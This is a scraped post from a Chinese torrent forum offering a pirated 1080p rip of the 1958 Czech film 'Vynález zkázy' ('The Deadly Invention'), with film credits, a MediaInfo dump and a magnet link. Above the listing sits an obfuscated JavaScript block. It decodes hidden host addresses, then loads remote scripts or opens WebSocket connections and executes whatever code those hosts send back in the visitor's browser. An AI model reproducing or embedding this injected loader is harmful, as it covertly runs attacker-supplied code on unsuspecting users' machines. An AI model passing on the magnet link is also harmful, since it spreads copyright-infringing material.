毁灭的发明[简繁字幕]The.Deadly.Invention.1958.Criterion.Collection.1080p.BluRay.x265.10bit.FLAC.MNHD-迅雷下载 5.17GB

版主小s 1月前 331

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x46\x6a\x59\x48\x73\x4f\x52\x52\x45\x59']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9vamxza2pmLm5pYYW5nYYW94aWFuc2hlbmcuYY29t','d3NzOOi8vd3MuaG5qanNoLmNvbTo4MDgwLHdzczovL3dzLnFpbmdsaXh5LmNvbTo4MDgwLHdzczovL3dzLnppb24tbGl2ZXMuY29tOOjgwOODA=',window,document,['Y','O']);}:function(){};

◎译  名 毁灭的发明 / A Deadly Invention / 恶魔的发明 / The Fabulous World Of Jules Verne / Invention for Destruction
◎片  名 Vynález zkázy
◎年  代 1958
◎产  地 捷克斯洛伐克
◎类  别 科幻 / 奇幻 / 冒险
◎语  言 捷克语
◎上映日期 1958-06-27
◎IMDb链接 https://www.imdb.com/title/tt0052374/
◎豆瓣评分 7.9/10 (492人评价)
◎豆瓣链接 https://movie.douban.com/subject/1940670/
◎片  长 USA: 83 分钟
◎导  演 卡尔·齐曼 Karel Zeman (id:1041849)
◎编  剧 弗兰蒂泽克·赫鲁宾 Frantisek Hrubín (id:1052795)
       儒勒·凡尔纳 Jules Verne (id:1007194)
       卡尔·齐曼 Karel Zeman (id:1041849)
◎演  员 卢博尔·托科什 Lubor Tokos (id:1149760)
       米罗斯拉夫·霍卢布 Miroslav Holub (id:1097849)
       弗兰蒂泽克·斯列格尔 Frantisek Slégr (id:1151289)
       休·唐斯 Hugh Downs (id:1087134)
       Frantisek Cerny Frantisek Cerny (id:1071280)
       奥托·希曼内克 Otto Simánek (id:1158924)
       Václav Trégl Václav Trégl (id:1151588)

◎标  签 捷克 / 科幻 / 动画 / 卡尔·齐曼 / 1958 / 捷克电影 / 奇幻 / 1950s

◎简  介
  As its title suggests THE FABULOUS WORLD OF JULES VERNE is an awe -inspiring, meticulous cinematic rendering of the aesthetic and conceptual inventions of proto-science fiction genius Jules Verne, based on one of the famed author's lesser known short stories. However, the real star of the film is the intricate art direction, successfully rendering the visual style of nineteenth...

  1. ##### MediaInfo ######
  2. General
  3. Unique ID                                : 181126804399362521883389792102991995841 (0x8843C0EE0D651E66BE34C716EEA323C1)
  4. Complete name                            : The.Deadly.Invention.19[email protected]BBQDDQ.COM.mkv
  5. Format                                   : Matroska
  6. Format version                           : Version 4
  7. File size                                : 5.17 GiB
  8. Duration                                 : 1 h 22 min
  9. Overall bit rate mode                    : Variable
  10. Overall bit rate                         : 8 920 kb/s
  11. Encoded date                             : UTC 2021-07-20 16:01:50
  12. Writing application                      : mkvmerge v45.0.0 ('Heaven in Pennies') 64-bit
  13. Writing library                          : libebml v1.3.10 + libmatroska v1.5.2
  14. Cover                                    : Yes
  15. Attachments                              : cover
  16. Video
  17. ID                                       : 1
  18. Format                                   : HEVC
  19. Format/Info                              : High Efficiency Video Coding
  20. Format profile                           : Main [email protected]@High
  21. Codec ID                                 : V_MPEGH/ISO/HEVC
  22. Duration                                 : 1 h 22 min
  23. Bit rate                                 : 8 184 kb/s
  24. Width                                    : 1 480 pixels
  25. Height                                   : 1 080 pixels
  26. Display aspect ratio                     : 1.370
  27. Frame rate mode                          : Constant
  28. Frame rate                               : 23.976 (24000/1001/53354) FPS
  29. Color space                              : YUV
  30. Chroma subsampling                       : 4:2:0
  31. Bit depth                                : 10 bits
  32. Bits/(Pixel*Frame)                       : 0.214
  33. Stream size                              : 4.74 GiB (92%)
  34. Writing library                          : x265 0.0:[Linux][GCC 7.5.0][64 bit] 10bit
  35. Encoding settings                        : cpuid=533541111039 / frame-threads=5 / wpp / pmode / no-pme / no-psnr / no-ssim / log-level=2 / input-csp=1 / input-res=1480x1080 / interlace=0 / total-frames=119337 / level-idc=0 / high-tier=1 / uhd-bd=0 / ref=6 / no-allow-non-conformance / no-repeat-headers / annexb / no-aud / no-hrd / info / hash=0 / no-temporal-layers / no-open-gop / min-keyint=23 / keyint=250 / gop-lookahead=0 / bframes=8 / b-adapt=2 / b-pyramid / bframe-bias=0 / rc-lookahead=80 / lookahead-slices=0 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / hist-scenecut=0 / radl=0 / no-splice / no-intra-refresh / ctu=32 / min-cu-size=8 / no-rect / no-amp / max-tu-size=32 / tu-inter-depth=4 / tu-intra-depth=4 / limit-tu=0 / rdoq-level=2 / dynamic-rd=0.00 / no-ssim-rd / signhide / no-tskip / nr-intra=0 / nr-inter=0 / no-constrained-intra / strong-intra-smoothing / max-merge=5 / limit-refs=0 / no-limit-modes / me=3 / subme=7 / merange=57 / temporal-mvp / no-frame-dup / no-hme / weightp / weightb / no-analyze-src-pics / deblock=-3:-3 / no-sao / no-sao-non-deblock / rd=4 / selective-sao=0 / no-early-skip / no-rskip / no-fast-intra / no-tskip-fast / no-cu-lossless / b-intra / no-splitrd-skip / rdpenalty=0 / psy-rd=1.00 / psy-rdoq=1.00 / no-rd-refine / no-lossless / cbqpoffs=0 / crqpoffs=0 / rc=crf / crf=23.0 / qcomp=0.60 / qpstep=4 / stats-write=0 / stats-read=0 / vbv-maxrate=160000 / vbv-bufsize=160000 / vbv-init=0.9 / crf-max=0.0 / crf-min=0.0 / ipratio=1.30 / pbratio=1.20 / aq-mode=2 / aq-strength=1.00 / cutree / zone-count=0 / no-strict-cbr / qg-size=32 / no-rc-grain / qpmax=69 / qpmin=0 / no-const-vbv / sar=0 / overscan=0 / videoformat=5 / range=0 / colorprim=1 / transfer=1 / colormatrix=1 / chromaloc=0 / display-window=0 / cll=0,0 / min-luma=0 / max-luma=1023 / log2-max-poc-lsb=8 / vui-timing-info / vui-hrd-info / slices=1 / no-opt-qp-pps / no-opt-ref-list-length-pps / no-multi-pass-opt-rps / scenecut-bias=0.05 / hist-threshold=0.01 / no-opt-cu-delta-qp / no-aq-motion / no-hdr10 / no-hdr10-opt / no-dhdr10-opt / no-idr-recovery-sei / analysis-reuse-level=0 / analysis-save-reuse-level=0 / analysis-load-reuse-level=0 / scale-factor=0 / refine-intra=0 / refine-inter=0 / refine-mv=1 / refine-ctu-distortion=0 / no-limit-sao / ctu-info=0 / no-lowpass-dct / refine-analysis-type=0 / copy-pic=1 / max-ausize-factor=1.0 / no-dynamic-refine / no-single-sei / no-hevc-aq / no-svt / no-field / qp-adaptation-range=1.00 / no-scenecut-aware-qpconformance-window-offsets / right=0 / bottom=0 / NTMzNTQ= / decoder-max-rate=0
  36. Default                                  : Yes
  37. Forced                                   : No
  38. Color range                              : Limited
  39. Color primaries                          : BT.709
  40. Transfer characteristics                 : BT.709
  41. Matrix coefficients                      : BT.709
  42. Audio #1
  43. ID                                       : 2
  44. Format                                   : FLAC
  45. Format/Info                              : Free Lossless Audio Codec
  46. Codec ID                                 : A_FLAC
  47. Duration                                 : 1 h 22 min
  48. Bit rate mode                            : Variable
  49. Bit rate                                 : 524 kb/s
  50. Channel(s)                               : 1 channel
  51. Channel layout                           : C
  52. Sampling rate                            : 48.0 kHz
  53. Frame rate                               : 10.417 FPS (4608 SPF)
  54. Bit depth                                : 24 bits
  55. Compression mode                         : Lossless
  56. Stream size                              : 311 MiB (6%)
  57. Writing library                          : Lavf58.45.100
  58. Language                                 : Czech
  59. Default                                  : Yes
  60. Forced                                   : No
  61. Audio #2
  62. ID                                       : 3
  63. Format                                   : AC-3
  64. Format/Info                              : Audio Coding 3
  65. Commercial name                          : Dolby Digital
  66. Codec ID                                 : A_AC3
  67. Duration                                 : 1 h 22 min
  68. Bit rate mode                            : Constant
  69. Bit rate                                 : 192 kb/s
  70. Channel(s)                               : 1 channel
  71. Channel layout                           : C
  72. Sampling rate                            : 48.0 kHz
  73. Frame rate                               : 31.250 FPS (1536 SPF)
  74. Compression mode                         : Lossy
  75. Stream size                              : 114 MiB (2%)
  76. Language                                 : English
  77. Service kind                             : Complete Main
  78. Default                                  : No
  79. Forced                                   : No
  80. Text #1
  81. ID                                       : 4
  82. Format                                   : PGS
  83. Muxing mode                              : zlib
  84. Codec ID                                 : S_HDMV/PGS
  85. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs
  86. Duration                                 : 1 h 21 min
  87. Bit rate                                 : 21.4 kb/s
  88. Count of elements                        : 784
  89. Stream size                              : 12.5 MiB (0%)
  90. Language                                 : English
  91. Default                                  : No
  92. Forced                                   : No
  93. Text #2
  94. ID                                       : 5
  95. Format                                   : PGS
  96. Muxing mode                              : zlib
  97. Codec ID                                 : S_HDMV/PGS
  98. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs
  99. Duration                                 : 1 h 21 min
  100. Bit rate                                 : 12.5 kb/s
  101. Count of elements                        : 798
  102. Stream size                              : 7.29 MiB (0%)
  103. Title                                    : Simplified Chinese
  104. Language                                 : Chinese
  105. Default                                  : Yes
  106. Forced                                   : No
  107. Text #3
  108. ID                                       : 6
  109. Format                                   : PGS
  110. Muxing mode                              : zlib
  111. Codec ID                                 : S_HDMV/PGS
  112. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs
  113. Duration                                 : 1 h 21 min
  114. Bit rate                                 : 12.7 kb/s
  115. Count of elements                        : 798
  116. Stream size                              : 7.40 MiB (0%)
  117. Title                                    : Traditional Chinese
  118. Language                                 : Chinese
  119. Default                                  : No
  120. Forced                                   : No
  121. Menu
  122. 00:00:00.000                             : en:Time of progress
  123. 00:03:20.283                             : en:The journey begins
  124. 00:07:35.955                             : en:Professor Roch
  125. 00:13:49.119                             : en:Searched
  126. 00:18:35.823                             : en:Aquatic empire
  127. 00:22:09.286                             : en:Show of strength
  128. 00:32:57.976                             : en:Strange hideout
  129. 00:38:37.815                             : en:Controlling matter
  130. 00:44:48.894                             : en:Sending messages
  131. 00:50:34.740                             : en:News from abroad
  132. 00:54:49.911                             : en:Without a trace
  133. 01:01:43.032                             : en:Among friends
  134. 01:09:28.789                             : en:Eavesdropping
  135. 01:15:10.589                             : en:Diabolical invention
  136. 01:21:14.578                             : en:Peace
  137. 01:22:57.097                             : en:Color bars


TAGS 奇幻 冒险 科幻

磁力链:
  • magnet:?xt=urn:btih:C33D8DFC63F2EBEEA9DBFF4932A63F6A7F6B8C82
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
发新帖